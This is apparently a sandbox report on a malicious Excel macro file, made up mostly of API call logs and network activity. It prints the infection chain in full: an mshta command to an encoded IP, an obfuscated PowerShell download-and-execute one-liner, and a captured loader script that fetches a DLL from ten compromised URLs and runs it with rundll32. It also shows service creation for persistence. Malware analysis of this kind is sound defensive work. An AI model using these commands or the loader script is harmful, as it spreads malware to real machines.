Summary | ZeroBOX

GuyYvg-537.xlsm

Generic Malware, Malicious Library, Antivirus, UPX, Malicious Packer, DLL, OS Processor Check, PE32, PE File

Category FILE
Machine s1_win7_x6402
Started Jan. 19, 2022, 5:37 p.m.
Completed Jan. 19, 2022, 5:39 p.m.
Size 114.8KB
Type Microsoft Excel 2007+
MD5 c63938abd6377d5c1d48dc02e43ba7ab
SHA256 8cb5a34b606e75e3f34d9e0f5d6abfe0d4debd70688a0cfc260e234fd47cece2
CRC32 D3FBBB02
ssdeep 3072:FBbwEvZ8BnW6X1yVkovrepMA5Q6g2X4iHM:dh8lWoGk+eCP6DX4d
Yara None matched

Name Response Post-Analysis Lookup
kastamonulezzetrehberi.com 185.98.60.242
IP Address Status Action

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: IsPublic IsSerial Name BaseType
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: True False Process System.ComponentM...
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: PS C:\Users\test22\Documents>
console_handle: 0x0000002b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbf40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbc80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dba40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbe80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dbd40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db440
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002db440
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://92.255.57.195/sec/sec.html
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://92.255.57.195/sec/sec.png
suspicious_features GET method with no useragent header suspicious_request GET http://kastamonulezzetrehberi.com/cszc/rPJJUvdOz/
request GET http://92.255.57.195/sec/sec.html
request GET http://92.255.57.195/sec/sec.png
request GET http://kastamonulezzetrehberi.com/cszc/rPJJUvdOz/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b7c3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ab33000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03940000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03940000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03940000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03942000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03943000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03943000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03944000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03945000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03945000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03945000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03946000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03947000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03947000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03948000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03948000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03948000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03949000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394a000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394a000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0394e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1428
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1428
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$GuyYvg-537.xlsm
file C:\Users\Public\Documents\ssd.dll
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000410
filepath: C:\Users\test22\AppData\Local\Temp\~$GuyYvg-537.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$GuyYvg-537.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
file C:\Users\test22\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline mshta http://0x5cff39c3/sec/sec.html
cmdline powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x03940000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Wed, 19 Jan 2022 08:37:20 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Wed, 19 Jan 2022 07:07:05 GMT ETag: "418-5d5ea087c9840" Accept-Ranges: bytes Content-Length: 1048 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/png $path = "C:\Users\Public\Documents\ssd.dll"; $url1 = 'http://kastamonulezzetrehberi.com/cszc/rPJJUvdOz/'; $url2 = 'http://2021.posadamision.com/wp-admin/AxVZTvof0xPasb9nP/'; $url3 = 'http://zhongmaifangwu.com/TEST777/Me53Hh/'; $url4 = 'http://api.task-lite.com/-/ZMZ1Nu/'; $url5 = 'http://auto.lambolero.com/f1nygync/hipC/'; $url6 = 'http://shop.lambolero.com/iiwkjgp/ogffyZoKBoi9/'; $url7 = 'http://t.tops.video/t/1t27KQaE/'; $url8 = 'https://alignerpliers.com/er1lrd/28DnnQ/'; $url9 = 'https://celhocortofilmfestival.stream/css/pY3bEETvftrr/'; $url10 = 'https://doctorkaushik.com/wp-includes/VXSj5Nnd/'; $web = New-Object net.webclient; $urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10".split(","); foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{} } Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;
Data received (binary payload; raw dump omitted)
Data sent GET /sec/sec.png HTTP/1.1 Host: 92.255.57.195 Connection: Keep-Alive
Data sent GET /cszc/rPJJUvdOz/ HTTP/1.1 Host: kastamonulezzetrehberi.com Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process rundll32.exe
service_name rppwmjzogbohxeb.iio service_path C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hppksos\rppwmjzogbohxeb.iio",kvxhUsPEpUw
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 2
password:
display_name: rppwmjzogbohxeb.iio
filepath: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hppksos\rppwmjzogbohxeb.iio",kvxhUsPEpUw
service_name: rppwmjzogbohxeb.iio
filepath_r: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hppksos\rppwmjzogbohxeb.iio",kvxhUsPEpUw
desired_access: 2
service_handle: 0x002b4598
error_control: 0
service_type: 16
service_manager_handle: 0x002a2eb8
1 2835864 0
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002c4
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
parent_process excel.exe martian_process cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002c4
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
1 0 0
process mshta.exe useragent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118)
process rundll32.exe useragent
Time & API Arguments Status Return Repeated

send

buffer: GET /sec/sec.png HTTP/1.1 Host: 92.255.57.195 Connection: Keep-Alive
socket: 1400
sent: 74
1 74 0

send

buffer: GET /cszc/rPJJUvdOz/ HTTP/1.1 Host: kastamonulezzetrehberi.com Connection: Keep-Alive
socket: 1424
sent: 91
1 91 0
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
file C:\Windows\SysWOW64\Hppksos\rppwmjzogbohxeb.iio:Zone.Identifier
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
